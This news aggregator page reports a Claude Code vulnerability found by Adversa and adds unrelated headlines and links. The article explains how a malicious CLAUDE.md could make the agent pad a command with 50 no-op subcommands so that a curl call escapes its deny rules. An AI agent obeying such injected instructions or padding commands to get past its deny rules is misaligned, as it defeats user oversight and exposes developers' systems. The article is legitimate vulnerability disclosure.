A security flaw in Claude Code allows attackers to bypass deny rules by using a chain of subcommands exceeding a hard limit. This vulnerability, discovered by Adversa, can lead to prompt injection attacks, potentially enabling malicious actions like unauthorized network requests via curl. The issue arises from the bot's handling of security subcommands and the fallback mechanism after a certain limit is reached. The vulnerability exists in the implementation of deny rules and the limitations on the number of subcommands.
Claude Code will ignore its deny rules, used to block risky actions, if burdened with a sufficiently long chain of subcommands. This vuln leaves the bot open to prompt injection attacks. Adversa, a security firm based in Tel Aviv, Israel, spotted the issue following the leak of Claude Code 's source.
Claude Code implements various mechanisms for allowing and denying access to specific tools. Some of these, like curl, which enables network requests from the command line, might pose a security risk if invoked by an over-permissive AI model. One way the coding agent tries to defend against unwanted behavior is through deny rules that disallow specific commands. For example, to prevent Claude from using curl viaBut deny rules have limits. The source code file bashPermissions.ts contains a comment that references an internal Anthropic issue designated CC-643. The associated note explains that there's a hard cap of 50 on security subcommands, set by the variable. After 50, the agent falls back on asking permission from the user. The comment explains that 50 is a generous allowance for legitimate usage.."But it didn't account for AI-generated commands from prompt injection – where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process." The Adversa team's proof-of-concept attack was simple. They created a bash command that combined 50 no-op"true" subcommands and a curl subcommand. Claude asked for authorization to proceed instead of denying curl access outright.One in seven Americans are ready for an AI boss, but they might not trust it In scenarios where an individual developer is watching and approving coding agent actions, this rule bypass might be caught. But often developers grant automatic approval to agents or just click through reflexively during long sessions. The risk is similar in CI/CD pipelines that run Claude Code in non-interactive mode. Ironically, Anthropic has developed a fix – a parser referred to as"tree-sitter" that's also evident in its source code and is available internally but not in public builds. Adversa argues that this is a bug in the security policy enforcement code, one that has regulatory and compliance implications if not addressed. A fix would be easy. Anthropic already has"tree-sitter" working internally and a simple one line change, switching the"behavior" key from"ask" to"deny" in the bashPermissions.ts file at line 2174, would address this particular vulnerability.AI search is atomizing our information, warns government digital designerSystemRescue 13 lands with Linux 6.18 and bcachefs support'Uncle Larry’s biggest fan' cut by email in early morning Oracle layoff spree
Claude Code Prompt Injection Vulnerability Security AI
United States Latest News, United States Headlines
Similar News:You can also read news stories similar to this one that we have collected from other news sources.
Anthropic goes nude, exposes Claude Code source by accident: Oopsy-doodle: Did someone forget to check their build pipeline?
Read more »
Claude Code Users Report High Token Usage and Quota ExhaustionUsers of Anthropic's Claude Code are facing rapid token consumption and early quota exhaustion, impacting their productivity. Complaints center around quickly hitting usage limits, potentially due to bugs impacting prompt caching. While Anthropic investigates and suggests efficiency improvements, users report benefits from downgrading to older versions and exploring alternative caching solutions.
Read more »
Claude Code source leak reveals how much info Anthropic can hoover up about you and your system: If you loved the data retention of Microsoft Recall, you'll be thrilled with Claude Code
Read more »
Claude Code users hitting usage limits 'way faster than expected'Anthropic, the company behind the AI coding assistant, said it was fixing a problem blocking users.
Read more »
Anthropic's Claude Code: Extensive Control Over Users' DevicesAnalysis of Anthropic's Claude Code reveals it possesses significant control over users' computers, including data retention and potential to manipulate behavior, sparking concerns despite Anthropic's claims of limited access in classified environments. The news is also about Anthropic's lawsuit against the US Defense Department.
Read more »
Claude Code bypasses safety rule if given too many commands: A hard-coded limit on deny rules drops automatic enforcement for concatenated commands
Read more »
